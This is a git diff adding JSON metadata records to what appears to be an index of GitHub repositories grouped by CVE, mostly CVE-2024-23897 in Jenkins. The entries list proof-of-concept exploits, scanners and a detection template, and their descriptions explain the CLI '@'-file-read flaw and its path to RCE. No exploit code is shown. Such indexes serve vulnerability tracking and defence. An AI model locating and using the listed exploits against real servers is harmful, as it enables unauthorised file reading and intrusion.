"stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-23897", + "jenkins" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749052396, + "name": "CVE-2024-23897", + "full_name": "3yujw7njai\/CVE-2024-23897", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2024-23897", + "description": "CVE-2024-23897 jenkins-cli", + "fork": false, + "created_at": "2024-01-27T12:57:28Z", + "updated_at": "2024-11-18T12:15:19Z", + "pushed_at": "2024-01-27T13:10:37Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749060845, + "name": "PoC-Fix-jenkins-rce_CVE-2024-23897", + "full_name": "10T4\/PoC-Fix-jenkins-rce_CVE-2024-23897", + "owner": { + "login": "10T4", + "id": 148342080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148342080?v=4", + "html_url": "https:\/\/github.com\/10T4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10T4\/PoC-Fix-jenkins-rce_CVE-2024-23897", + "description": "on this git you can find all information on the CVE-2024-23897", + "fork": false, + "created_at": "2024-01-27T13:27:57Z", + "updated_at": "2024-03-18T21:30:46Z", + "pushed_at": "2024-01-27T14:43:18Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749172653, + "name": "CVE-2024-23897", + "full_name": "wjlin0\/CVE-2024-23897", + "owner": { + "login": "wjlin0", + "id": 91306421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91306421?v=4", + "html_url": "https:\/\/github.com\/wjlin0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wjlin0\/CVE-2024-23897", + "description": "CVE-2024-23897 - Jenkins 任意文件读取 利用工具", + "fork": false, + "created_at": "2024-01-27T19:34:48Z", + "updated_at": "2024-11-16T19:50:18Z", + "pushed_at": "2024-03-16T07:55:41Z", + "stargazers_count": 72, + "watchers_count": 72, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-23897", + "jenkins" + ], + "visibility": "public", + "forks": 12, + "watchers": 72, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 749248494, + "name": "CVE-2024-23897", + "full_name": "Vozec\/CVE-2024-23897", + "owner": { + "login": "Vozec", + "id": 61807609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61807609?v=4", + "html_url": "https:\/\/github.com\/Vozec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vozec\/CVE-2024-23897", + "description": "This repository presents a proof-of-concept of CVE-2024-23897", + "fork": false, + "created_at": "2024-01-28T01:57:06Z", + "updated_at": "2024-10-14T07:36:09Z", + "pushed_at": "2024-04-16T06:56:39Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 749389006, + "name": "CVE-2024-23897", + "full_name": "r0xdeadbeef\/CVE-2024-23897", + "owner": { + "login": "r0xdeadbeef", + "id": 65211256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65211256?v=4", + "html_url": "https:\/\/github.com\/r0xdeadbeef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0xdeadbeef\/CVE-2024-23897", + "description": "Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.", + "fork": false, + "created_at": "2024-01-28T12:53:23Z", + "updated_at": "2024-01-29T18:53:19Z", + "pushed_at": "2024-01-28T13:28:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749635165, + "name": "CVE-2024-23897", + "full_name": "viszsec\/CVE-2024-23897", + "owner": { + "login": "viszsec", + "id": 8476317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8476317?v=4", + "html_url": "https:\/\/github.com\/viszsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viszsec\/CVE-2024-23897", + "description": "Jenkins POC of Arbitrary file read vulnerability through the CLI can lead to RCE", + "fork": false, + "created_at": "2024-01-29T04:41:53Z", + "updated_at": "2024-08-16T09:02:15Z", + "pushed_at": "2024-01-31T03:14:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749788968, + "name": "CVE-2024-23897", + "full_name": "jopraveen\/CVE-2024-23897", + "owner": { + "login": "jopraveen", + "id": 56404692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56404692?v=4", + "html_url": "https:\/\/github.com\/jopraveen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jopraveen\/CVE-2024-23897", + "description": null, + "fork": false, + "created_at": "2024-01-29T12:00:25Z", + "updated_at": "2024-01-29T18:02:51Z", + "pushed_at": "2024-01-29T12:14:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751156545, + "name": "Jenkins-CVE-2024-23897", + "full_name": "AbraXa5\/Jenkins-CVE-2024-23897", + "owner": { + "login": "AbraXa5", + "id": 41234094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41234094?v=4", + "html_url": "https:\/\/github.com\/AbraXa5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbraXa5\/Jenkins-CVE-2024-23897", + "description": "PoC for Jenkins CVE-2024-23897", + "fork": false, + "created_at": "2024-02-01T03:17:35Z", + "updated_at": "2024-02-05T03:54:30Z", + "pushed_at": "2024-02-04T18:31:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752057600, + "name": "CVE-2024-23897-RCE", + "full_name": "brijne\/CVE-2024-23897-RCE", + "owner": { + "login": "brijne", + "id": 158627341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158627341?v=4", + "html_url": "https:\/\/github.com\/brijne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brijne\/CVE-2024-23897-RCE", + "description": "CVE-2024-23897 jenkins arbitrary file read which leads to unauthenticated RCE", + "fork": false, + "created_at": "2024-02-02T23:13:26Z", + "updated_at": "2024-02-02T23:13:27Z", + "pushed_at": "2024-02-02T23:19:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752485327, + "name": "Jenkins-CVE-2024-23897-", + "full_name": "WLXQqwer\/Jenkins-CVE-2024-23897-", + "owner": { + "login": "WLXQqwer", + "id": 125850977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125850977?v=4", + "html_url": "https:\/\/github.com\/WLXQqwer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WLXQqwer\/Jenkins-CVE-2024-23897-", + "description": null, + "fork": false, + "created_at": "2024-02-04T01:14:40Z", + "updated_at": "2024-02-04T01:21:30Z", + "pushed_at": "2024-02-04T01:23:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752803918, + "name": "CVE-2024-23897", + "full_name": "kaanatmacaa\/CVE-2024-23897", + "owner": { + "login": "kaanatmacaa", + "id": 57772940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57772940?v=4", + "html_url": "https:\/\/github.com\/kaanatmacaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaanatmacaa\/CVE-2024-23897", + "description": "Nuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)", + "fork": false, + "created_at": "2024-02-04T20:56:42Z", + "updated_at": "2024-11-20T20:01:17Z", + "pushed_at": "2024-02-05T14:10:26Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": true, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754184572, + "name": "CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability", + "full_name": "Praison001\/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability", + "description": "Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.", + "fork": false, + "created_at": "2024-02-07T15:07:37Z", + "updated_at": "2024-11-09T20:19:57Z", + "pushed_at": "2024-02-09T13:22:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 757151446, + "name": "CVE-2024-23897", + "full_name": "B4CK4TT4CK\/CVE-2024-23897", + "owner": { + "login": "B4CK4TT4CK", + "id": 76169213, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76169213?v=4", + "html_url": "https:\/\/github.com\/B4CK4TT4CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B4CK4TT4CK\/CVE-2024-23897", + "description": "CVE-2024-23897", + "fork": false, + "created_at": "2024-02-13T22:38:50Z", + "updated_at": "2024-02-13T22:40:08Z", + "pushed_at": "2024-02-13T22:44:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 758374072, + "name": "CVE-2024-23897", + "full_name": "godylockz\/CVE-2024-23897", + "owner": { + "login": "godylockz", + "id": 81207744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81207744?v=4", + "html_url": "https:\/\/github.com\/godylockz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/godylockz\/CVE-2024-23897", + "description": "POC for CVE-2024-23897 Jenkins File-Read ", + "fork": false, + "created_at": "2024-02-16T07:16:04Z", + "updated_at": "2024-11-24T05:22:57Z", + "pushed_at": "2024-02-17T16:39:19Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 758722924, + "name": "CVE-2024-23897", + "full_name": "ifconfig-me\/CVE-2024-23897", + "owner": { + "login": "ifconfig-me", + "id": 25315805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315805?v=4", + "html_url": "https:\/\/github.com\/ifconfig-me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifconfig-me\/CVE-2024-23897", + "description": "Jenkins Arbitrary File Leak Vulnerability [CVE-2024-23897]", + "fork": false, + "created_at": "2024-02-16T23:21:40Z", + "updated_at": "2024-02-16T23:23:25Z", + "pushed_at": "2024-02-17T15:20:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 759622445, + "name": "CVE-2024-23897", + "full_name": "ThatNotEasy\/CVE-2024-23897", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-23897", + "description": "Perform with massive Jenkins Reading-2-RCE", + "fork": false, + "created_at": "2024-02-19T02:29:12Z", + "updated_at": "2024-10-06T15:53:26Z", + "pushed_at": "2024-03-02T07:55:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 760525998, + "name": "CVE-2024-23897-Arbitrary-file-read", + "full_name": "pulentoski\/CVE-2024-23897-Arbitrary-file-read", + "owner": { + "login": "pulentoski", + "id": 60004847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60004847?v=4", + "html_url": "https:\/\/github.com\/pulentoski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pulentoski\/CVE-2024-23897-Arbitrary-file-read", + "description": "Un script realizado en python para atumatizar la vulnerabilidad CVE-2024-23897 ", + "fork": false, + "created_at": "2024-02-20T15:26:34Z", + "updated_at": "2024-11-18T19:25:24Z", + "pushed_at": "2024-11-18T19:25:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 761368362, + "name": "CVE-2024-23897", + "full_name": "Nebian\/CVE-2024-23897", + "owner": { + "login": "Nebian", + "id": 57531705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57531705?v=4", + "html_url": "https:\/\/github.com\/Nebian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nebian\/CVE-2024-23897", + "description": "Scraping tool to ennumerate directories or files with the CVE-2024-23897 vulnerability in Jenkins.", + "fork": false, + "created_at": "2024-02-21T18:32:45Z", + "updated_at": "2024-02-23T23:55:35Z", + "pushed_at": "2024-02-21T19:07:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795412184, + "name": "CVE-2024-23897", + "full_name": "JAthulya\/CVE-2024-23897", + "owner": { + "login": "JAthulya", + "id": 55212811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55212811?v=4", + "html_url": "https:\/\/github.com\/JAthulya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAthulya\/CVE-2024-23897", + "description": "Jenkins CVE-2024-23897: Arbitrary File Read Vulnerability", + "fork": false, + "created_at": "2024-05-03T08:18:51Z", + "updated_at": "2024-08-29T16:22:10Z", + "pushed_at": "2024-05-03T08:33:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 797182683, + "name": "CVE-2024-23897", + "full_name": "murataydemir\/CVE-2024-23897", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2024-23897", + "description": "[CVE-2024-23897] Jenkins CI Authenticated Arbitrary File Read Through the CLI Leads to Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-05-07T11:00:03Z", + "updated_at": "2024-05-07T14:44:44Z", + "pushed_at": "2024-05-07T14:28:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 797525465, + "name": "CVE-2024-23897-Jenkins-4.441", + "full_name": "mil4ne\/CVE-2024-23897-Jenkins-4.441", + "owner": { + "login": "mil4ne", + "id": 89859279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89859279?v=4", + "html_url": "https:\/\/github.com\/mil4ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mil4ne\/CVE-2024-23897-Jenkins-4.441", + "description": null, + "fork": false, + "created_at": "2024-05-08T02:28:46Z", + "updated_at": "2024-07-26T03:10:16Z", + "pushed_at": "2024-05-08T02:34:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801466453, + "name": "CVE-2024-23897", + "full_name": "Maalfer\/CVE-2024-23897", + "owner": { + "login": "Maalfer", + "id": 96432001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96432001?v=4", + "html_url": "https:\/\/github.com\/Maalfer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maalfer\/CVE-2024-23897", + "description": "Poc para explotar la vulnerabilidad CVE-2024-23897 en versiones 2.441 y anteriores de Jenkins, mediante la cual podremos leer archivos internos del sistema sin estar autenticados", + "fork": false, + "created_at": "2024-05-16T09:32:51Z", + "updated_at": "2024-11-20T16:30:47Z", + "pushed_at": "2024-05-17T11:54:26Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 806068547, + "name": "Surko-Exploit-Jenkins-CVE-2024-23897", + "full_name": "Surko888\/Surko-Exploit-Jenkins-CVE-2024-23897", + "owner": { + "login": "Surko888", + "id": 69545458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69545458?v=4", + "html_url": "https:\/\/github.com\/Surko888", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Surko888\/Surko-Exploit-Jenkins-CVE-2024-23897", + "description": "Un exploit con el que puedes aprovecharte de la vulnerabilidad (CVE-2024-23897)", + "fork": false, + "created_at": "2024-05-26T09:35:54Z", + "updated_at": "2024-06-01T23:48:46Z", + "pushed_at": "2024-06-01T23:48:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834942808, + "name": "CVE-2024-23897", + "full_name": "cc3305\/CVE-2024-23897", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2024-23897", + "description": "CVE-2024-23897 exploit script", + "fork": false, + "created_at": "2024-07-28T19:16:13Z", + "updated_at": "2024-10-28T21:16:23Z", + "pushed_at": "2024-10-28T21:15:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851732460, + "name": "Jenkins-Exploit-CVE-2024-23897-Fsociety", + "full_name": "BinaryGoodBoy0101\/Jenkins-Exploit-CVE-2024-23897-Fsociety", + "owner": { + "login": "BinaryGoodBoy0101", + "id": 171997927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171997927?v=4", + "html_url": "https:\/\/github.com\/BinaryGoodBoy0101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BinaryGoodBoy0101\/Jenkins-Exploit-CVE-2024-23897-Fsociety", + "description": "exploit diseñado para aprovechar una vulnerabilidad crítica en Jenkins versiones <= 2.441. La vulnerabilidad, CVE-2024-23897, permite la lectura arbitraria de archivos a través del CLI de Jenkins, lo que puede llevar a la exposición de información sensible o incluso a la ejecución remota de código (RCE) bajo ciertas circunstancias.", + "fork": false, + "created_at": "2024-09-03T16:06:40Z", + "updated_at": "2024-09-03T16:06:41Z", + "pushed_at": "2024-09-03T16:06:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854769953, + "name": "PBL05-CVE-Analsys", + "full_name": "ShieldAuth-PHP\/PBL05-CVE-Analsys", + "owner": { + "login": "ShieldAuth-PHP", + "id": 180364853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180364853?v=4", + "html_url": "https:\/\/github.com\/ShieldAuth-PHP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShieldAuth-PHP\/PBL05-CVE-Analsys", + "description": "CVE-2024-23897 분석", + "fork": false, + "created_at": "2024-09-09T18:42:34Z", + "updated_at": "2024-09-09T18:43:25Z", + "pushed_at": "2024-09-09T18:42:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 865507408, + "name": "CVE-2024-23897", + "full_name": "verylazytech\/CVE-2024-23897", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-23897", + "description": "POC - Jenkins File Read Vulnerability - CVE-2024-23897", + "fork": false, + "created_at": "2024-09-30T16:38:28Z", + "updated_at": "2024-11-26T21:33:10Z", + "pushed_at": "2024-11-26T14:46:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2024-23897", + "cve-2024-23897", + "jenkins-file-read", + "poc-cve-2024-23897", + "unauthenticated-read", + "unauthenticated-read-files" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23995.json b/2024/CVE-2024-23995.json new file mode 100644 index 0000000000..e58b9f2471 --- /dev/null +++ b/2024/CVE-2024-23995.json @@ -0,0 +1,33 @@ +[ + { + "id": 853174519, + "name": "CVE-2024-23995", + "full_name": "EQSTLab\/CVE-2024-23995", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-23995", + "description": "PoC for CVE-2024-23995", + "fork": false, + "created_at": "2024-09-06T06:14:36Z", + "updated_at": "2024-09-06T06:15:04Z", + "pushed_at": "2024-09-06T06:15:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23997.json b/2024/CVE-2024-23997.json new file mode 100644 index 0000000000..13663c5493 --- /dev/null +++ b/2024/CVE-2024-23997.json @@ -0,0 +1,33 @@ +[ + { + "id": 853172003, + "name": "CVE-2024-23997", + "full_name": "EQSTLab\/CVE-2024-23997", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-23997", + "description": "PoC for CVE-2024-23997", + "fork": false, + "created_at": "2024-09-06T06:07:12Z", + "updated_at": "2024-09-06T06:10:23Z", + "pushed_at": "2024-09-06T06:10:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23998.json b/2024/CVE-2024-23998.json new file mode 100644 index 0000000000..ea16926087 --- /dev/null +++ b/2024/CVE-2024-23998.json @@ -0,0 +1,33 @@ +[ + { + "id": 853173399, + "name": "CVE-2024-23998", + "full_name": "EQSTLab\/CVE-2024-23998", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-23998", + "description": "PoC for CVE-2024-23998", + "fork": false, + "created_at": "2024-09-06T06:11:15Z", + "updated_at": "2024-09-06T06:11:57Z", + "pushed_at": "2024-09-06T06:11:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24034.json b/2024/CVE-2024-24034.json new file mode 100644 index 0000000000..a30a21865c --- /dev/null +++ b/2024/CVE-2024-24034.json @@ -0,0 +1,33 @@ +[ + { + "id": 753711004, + "name": "CVE-2024-24034", + "full_name": "ELIZEUOPAIN\/CVE-2024-24034", + "owner": { + "login": "ELIZEUOPAIN", + "id": 102467898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102467898?v=4", + "html_url": "https:\/\/github.com\/ELIZEUOPAIN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ELIZEUOPAIN\/CVE-2024-24034", + "description": null, + "fork": false, + "created_at": "2024-02-06T16:47:07Z", + "updated_at": "2024-02-09T08:21:07Z", + "pushed_at": "2024-02-06T17:09:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24035.json b/2024/CVE-2024-24035.json new file mode 100644 index 0000000000..3da700d7bd --- /dev/null +++ b/2024/CVE-2024-24035.json @@ -0,0 +1,33 @@ +[ + { + "id": 753765755, + "name": "CVE-2024-24035", + "full_name": "ELIZEUOPAIN\/CVE-2024-24035", + "owner": { + "login": "ELIZEUOPAIN", + "id": 102467898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102467898?v=4", + "html_url": "https:\/\/github.com\/ELIZEUOPAIN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ELIZEUOPAIN\/CVE-2024-24035", + "description": null, + "fork": false, + "created_at": "2024-02-06T18:49:34Z", + 